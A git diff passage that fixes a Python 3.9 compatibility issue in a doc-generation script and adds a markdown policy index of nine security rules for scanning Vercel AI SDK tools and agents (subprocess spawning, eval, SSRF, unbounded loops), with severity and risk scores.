{risk} @@ -246,7 +251,10 @@ def main() -> int: drift.append(rel) else: path.parent.mkdir(parents=True, exist_ok=True) - path.write_text(content, encoding="utf-8", newline="\n") + # write_bytes (not write_text(newline=...)) keeps the output LF on + # every platform AND runs on Python 3.9 — write_text's newline kwarg + # is 3.10+, which crashed regeneration under the repo's default python3. + path.write_bytes(content.encode("utf-8")) print(f"wrote {rel}") if args.check: diff --git a/vercel_ai/POLICY_INDEX.md b/vercel_ai/POLICY_INDEX.md new file mode 100644 index 0000000..6633e70 --- /dev/null +++ b/vercel_ai/POLICY_INDEX.md @@ -0,0 +1,18 @@ + +# Vercel AI SDK policy index + +9 rules — 5 tool · 3 agent · 1 repo + +Risk score = `severity_weight × confidence × 100` (engine formula; weights: low=0.15, medium=0.40, high=0.70). Higher = worse. + +| | Id | SDK/ADK | Scope | Applies To | Policy | Severity | Confidence | Risk | Source | +| - | ------- | --------- | ----- | --------------- | ----------------------------------------------------------------------- | -------- | ---------- | ---- | ----------------------------------------------------------------------------------------------------------- | +| 1 | VAI-001 | Vercel AI | tool | vercel_ai_tool | Vercel AI tool execute() spawns a subprocess | high | 0.85 | 59.5 | [shell_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/vercel_ai/shell_safety.yaml) | +| 2 | VAI-002 | Vercel AI | tool | vercel_ai_tool | Vercel AI tool execute() evaluates code (eval / new Function) | high | 0.90 | 63.0 | [code_execution.yaml](https://github.com/trustabl/trustabl-rules/blob/main/vercel_ai/code_execution.yaml) | +| 3 | VAI-003 | Vercel AI | tool | vercel_ai_tool | Vercel AI tool execute() fetches a model-controlled URL | high | 0.75 | 52.5 | [ssrf.yaml](https://github.com/trustabl/trustabl-rules/blob/main/vercel_ai/ssrf.yaml) | +| 4 | VAI-004 | Vercel AI | tool | vercel_ai_tool | Vercel AI tool has no description | low | 
0.90 | 13.5 | [tool_definition.yaml](https://github.com/trustabl/trustabl-rules/blob/main/vercel_ai/tool_definition.yaml) | +| 5 | VAI-005 | Vercel AI | tool | vercel_ai_tool | Vercel AI tool accepts untyped input | medium | 0.80 | 32.0 | [tool_definition.yaml](https://github.com/trustabl/trustabl-rules/blob/main/vercel_ai/tool_definition.yaml) | +| 6 | VAI-006 | Vercel AI | agent | vercel_ai_agent | Vercel AI agent wires a provider shell / computer / code-execution tool | high | 0.85 | 59.5 | [agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/vercel_ai/agent_safety.yaml) | +| 7 | VAI-007 | Vercel AI | agent | vercel_ai_agent | Vercel AI agent tool loop has no step bound | medium | 0.60 | 24.0 | [agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/vercel_ai/agent_safety.yaml) | +| 8 | VAI-008 | Vercel AI | agent | vercel_ai_agent | Vercel AI agent forces a provider execution tool every step | medium | 0.65 | 26.0 | [agent_safety.yaml](https://github.com/trustabl/trustabl-rules/blob/main/vercel_ai/agent_safety.yaml) | +| 9 | VAI-012 | Vercel AI | repo | vercel_ai | Vercel AI project ships no agent-guidance doc (AGENTS.md/CLAUDE.md) | low | 0.90 | 13.5 | [repo_hygiene.yaml](https://github.com/trustabl/trustabl-rules/blob/main/vercel_ai/repo_hygiene.yaml) |